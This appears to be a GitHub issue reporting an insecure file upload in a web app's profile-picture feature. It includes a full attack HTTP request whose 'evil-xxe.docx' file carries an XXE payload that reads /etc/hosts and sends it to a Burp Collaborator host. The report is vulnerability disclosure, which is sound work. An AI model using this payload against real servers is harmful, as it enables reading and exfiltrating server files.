Insecure File Upload #4

jeremybuis · 2017-10-26T15:50:28Z

Steps to reproduce:

Login as any user
Upload a new profile picture
Upload any file type

I was able to upload docx, svg, xml, html, jsp etc

Attack Request:

POST /image HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------264311999222285
Content-Length: 827
Referer: https://192.168.99.100:8443/settings?id=1002
Cookie: JSESSIONID=D997F0ADEA6C0E4E5445D957349C22F0
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------264311999222285
Content-Disposition: form-data; name="creator_id"

1002
-----------------------------264311999222285
Content-Disposition: form-data; name="owner_id"

1002
-----------------------------264311999222285
Content-Disposition: form-data; name="label"

Profile Picture
-----------------------------264311999222285
Content-Disposition: form-data; name="context"

profile
-----------------------------264311999222285
Content-Disposition: form-data; name="file"; filename="evil-xxe.docx"
Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document

<!ENTITY % data SYSTEM "file:///etc/hosts"><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'yy08gndcee5xrh6ws928gj4qlhr7fw.burpcollaborator.net?%data;'>">
-----------------------------264311999222285--

Attack response:

HTTP/1.1 302 
Location: settings?id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 15:49:25 GMT
Connection: close

The text was updated successfully, but these errors were encountered:

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Insecure File Upload #4

Insecure File Upload #4

jeremybuis commented Oct 26, 2017

Insecure File Upload #4

Insecure File Upload #4

Comments

jeremybuis commented Oct 26, 2017